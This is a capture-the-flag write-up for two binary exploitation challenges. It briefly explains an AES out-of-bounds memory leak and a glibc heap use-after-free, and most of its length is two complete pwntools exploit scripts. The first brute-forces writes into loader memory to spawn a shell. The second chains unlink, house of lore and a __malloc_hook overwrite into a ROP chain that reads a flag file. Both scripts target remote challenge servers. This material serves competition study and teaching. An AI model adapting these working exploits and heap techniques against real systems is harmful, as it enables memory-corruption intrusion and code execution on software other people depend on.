Crypto in the Shell

The vulnerability is easy: the encryption causes out-of-bound access. We can encrypt a piece of memory with arbitrary offset and the result of encryption is printed. Here are steps to exploit:

  1. Encrypt the key, and the result of encryption will be shown, which is the new key
  2. Encrypt the offset -0x3a0, decrypt the result to leak the program address
  3. Similarly, encrypt the offset -0x40 to leak libc address, since it stores stderr. Note that we can not use stdout or stdin to leak libc address, since they are being used by the program and changing their contents will cause crash
  4. Use libc_addr+0x3f04c0 to leak stack address, then we can rewrite loop variable i to bypass number of encryption limitation. However, due to existence of ASLR, we only have 1/2 probability to make i negative
  5. Brute-force byte-by-byte to rewrite ld_addr+0x228968 to "sh" and ld_addr+0x228f60 to &system. Due to remote timeout, we need to pre-calculate number of encryptions needed to obtain a certain byte and send payloads altogether
  6. exit to get the shell
from pwn import *
from random import *
from time import time
from hashlib import *
from Crypto.Cipher import AES
from binascii import *

AES_BLOCK_SIZE = 16
g_local=1
context(log_level='debug', arch='amd64')
e = ELF("/lib/x86_64-linux-gnu/libc-2.27.so")
if g_local:
	sh = process("./chall")
	gdb.attach(sh)
else:
	sh = remote("3.113.219.89", 31337)

def enc(off, size=0xf):
	off &= 0xffffffffffffffff
	size &= 0xffffffffffffffff
	sh.sendline(str(off))
	sh.sendlineafter("size:", str(size))
	ret = sh.recvuntil("offset:")[:-len("offset:")]
	assert len(ret) % 0x10 == 0
	return ret

key = enc(-0x20)
iv = 0x10 * '\x00'
def dec(data):
	return AES.new(key, AES.MODE_CBC, iv).decrypt(data)
def enc2(data):
	return AES.new(key, AES.MODE_CBC, iv).encrypt(data)

prog_addr = dec(enc(-0x3a0))
prog_addr = u64(prog_addr[8:]) - 0x202008
print hex(prog_addr)


libc_addr = dec(enc(-0x40))
libc_addr = u64(libc_addr[:8]) - e.symbols["_IO_2_1_stderr_"]
print hex(libc_addr)

def calc_off(addr):
	return addr - (prog_addr + 0x2023a0)

env_off = calc_off(libc_addr+0x3f04c0)

stack_addr = dec(enc(env_off))
stack_addr = u64(stack_addr[:8]) + 0x10 - 0x120
print hex(stack_addr)

# 0.5, need to make i negative
enc(calc_off(stack_addr))


# previous bytes might be affected
def write_byte(addr, val, data):
	assert len(data) == 0x10
	off = calc_off(addr - 0xf)
	count = 0
	while True:
		data = enc2(data)
		count += 1
		if u8(data[0xf]) == val:
			break
	for i in xrange(count):
		sh.send(str(off) + '\n15\n')
	for i in xrange(count):
		sh.recvuntil("offset:")
	return data

ld_addr = libc_addr + 0x3f1000

def write_bytes(addr, s, data):
	assert len(data) == 0x10 + len(s)
	i = len(s) - 1
	for c in s[::-1]:
		data = data[:1+i] + write_byte(\
			addr + i, u8(c), data[1+i:0x11+i]) + \
			data[0x11+i:]
		i -= 1

# print hex(u64(dec(enc(calc_off(ld_addr + 0x228f50)))[:8]))
# sh.interactive()
od1 = p64(0) + p64(1)
write_bytes(ld_addr + 0x228968, "sh", od1 + 2*'\x00')
od2 = p64(0) + p64(0)
write_bytes(ld_addr + 0x228f60, \
	p64(libc_addr + e.symbols["system"])[:3], \
	od2+p64(ld_addr+0x10e0)[:3])
# local 0x440->0x441
# remote 0x440->0x496

# print hex(libc_addr + e.symbols["system"])
# print hex(u64(dec(enc(calc_off(ld_addr + 0x228f60)))[:8]))
# print hex(u64(dec(enc(calc_off(ld_addr + 0x228968)))[:8]))

sh.interactive()

One Punch Man

The vulnerability is a simple UAF, the relevant leakage is very easy, but we can only use calloc in normal allocation which does not use tcache, and size does not allow usage of fastbin and unsorted bin that would not be inserted into tcache. The hidden function allows malloc(0x217), but only when 0x220 tcache count is larger than 6, so we cannot write fd to achieve arbitrary write.

Initially we tried unsorted bin attack, but it seems that we must use chunk that will not be putted into tcache to do unsorted bin attack. Then I tried house of lore to allocate a chunk at tcache arena, however the program crashes at memset function since the size passed into memset function is too large. The root cause is that calloc uses the chunk_size-0x10 as the argument of memset, and chunk_size can only be 0 or a heap address, which always gives a size that is way too large.

The solution to that is to use unlink first to rewrite 0x220 tcache pointer to &pointer - 0x18, so that we can allocate a chunk at tcache arena to fake a 0x10 chunk size there first, then use house of lore attack again, and this time size passed into memset is 0x10-0x10=0 which does not cause any crash.

Then it is easy to rewrite the 0x220 tcache pointer while still keeping tcache count being 7, by allocating malloc(0x217) we can achieve arbitrary memory write. We can write __malloc_hook and perform ROP since stack contents are controllable.

from pwn import *

AES_BLOCK_SIZE = 16
g_local=0
context(log_level='debug', arch='amd64')
e = ELF("./libc.so.6")
if g_local:
	sh = process("./one_punch", env={"LD_LIBRARY_PATH":"."})
	gdb.attach(sh)
else:
	sh = remote("52.198.120.1", 48763)

def ce(cmd, idx, name):
	sh.send(cmd + '\x00')
	sh.sendafter("idx: ", str(idx) + '\x00')
	sh.sendafter("name: ", name)
	sh.recvuntil("> ")

create = lambda idx,name: ce('1', idx, name)
edit = lambda idx,name: ce('2', idx, name)

def show(idx):
	sh.send('3\x00')
	sh.sendafter("idx: ", str(idx) + '\x00')
	sh.recvuntil("name: ")
	ret = sh.recvuntil("\n####")[:-5]
	sh.recvuntil("> ")
	return ret

def delete(idx):
	sh.send('4\x00')
	sh.sendafter("idx: ", str(idx) + '\x00')
	return sh.recvuntil("> ")

def punch(data="a"):
	sh.send("50056".ljust(8, '\x00'))
	sh.send(data)
	sh.recvuntil("> ")

create(0, '0' * 0x217)
create(1, '1' * 0x217)

delete(0)
delete(1)

heap_addr = u64(show(1) + '\x00\x00') - 0x260

for i in xrange(5):
	create(0, '2' * 0x217)
	delete(0)

create(0, '2' * 0x217)
create(1, '3' * 0x217)
delete(0)

libc_addr = u64(show(0)+'\x00\x00') - 0x1e4ca0
print hex(heap_addr),hex(libc_addr)
delete(1)

punch() # consume 1 tcache
create(0, 'T' * 0x217)
delete(0)
edit(0, p64(0)*2)
delete(0)
# now top chunk + 0x10 == top elem in 0x220

for i in xrange(3):
	create(i, 'U' * 0x217)
for i in xrange(3):
	delete(i) # all merged to top

fake_chunk = p64(0) + p64(0x211)
fake_chunk += p64(heap_addr + 0x150 - 0x18)
fake_chunk += p64(heap_addr + 0x150 - 0x10)
fake_chunk = fake_chunk.ljust(0x210, 'F')
fake_chunk += p64(0x210) + p64(0x600)

create(0, cyclic(0x400))
edit(0, fake_chunk)
# 0x220 <- 0x200 top
# +0x1e0 <- g[2].ptr
create(2, cyclic(0x400))

# current heap layout:
# 0x400 chunk
# [fake 0x210 chunk + 0x600 chunk head, whose next is top]
# 0x400 chunk

delete(1) # unlink trigger, things merged to top

punch(p64(0x28))
# fake chunk_size for smallbin attack
# otherwise calloc will crash in memset

create(0, '7' * 0x217)
delete(0) # fill 0x220 tcache

# consolidate topchunk
for i in xrange(6):
	create(0, '4' * 0x1f0)
	delete(0)

create(1, 'P' * 0x217) # create a padding
create(0, '4' * 0x1f0) # last tcache chunk

delete(0) # put it to tcache
edit(0, p64(0) + p64(0))
# rewrite fd and key to bypass double free check

delete(0) # to topchunk
delete(1) # to topchunk

# now 0x200 -> 7, top element is behind topchunk
# now 0x220 -> 7

create(0, '5' * 0x220)
create(0, '4' * 0x1f0) # chunk_head == top at 0x200
create(1, '5' * 0x200)

delete(0)
create(1, '5' * 0x200) # put to smallbin

edit(0, p64(libc_addr+0x1e4e90) + p64(heap_addr+0x130))
delete(1)
edit(1, p64(0)*2 + p64(heap_addr+0x130))

create(0, 'C' * 0x1f0)
create(0, 'A' * 0x10 + p64(libc_addr + \
	e.symbols["__malloc_hook"]).ljust(0x1e0, '\x00'))

# add rsp,48; ret
punch(p64(libc_addr + 0x8cfd6) + "flag\x00")

pop_rdi = p64(libc_addr + 0x26542)
pop_rsi = p64(libc_addr + 0x26f9e)
pop_rdx = p64(libc_addr + 0x12bda6)
pop_rcx = p64(libc_addr + 0x10b31e)

rop = pop_rdi + p64(2)
rop += pop_rsi
rop += p64(libc_addr + e.symbols["__malloc_hook"] + 8)
rop += pop_rdx + p64(0)
rop += p64(libc_addr + e.symbols["syscall"])
rop += pop_rdi + p64(3)
rop += pop_rsi + p64(heap_addr + 0x2000)
rop += pop_rdx + p64(0x100)
rop += p64(libc_addr + e.symbols["read"])
rop += pop_rdi + p64(1)
rop += pop_rsi + p64(heap_addr + 0x2000)
rop += pop_rdx + p64(0x100)
rop += p64(libc_addr + e.symbols["write"])
rop += p64(0)

create(0, rop)

sh.interactive()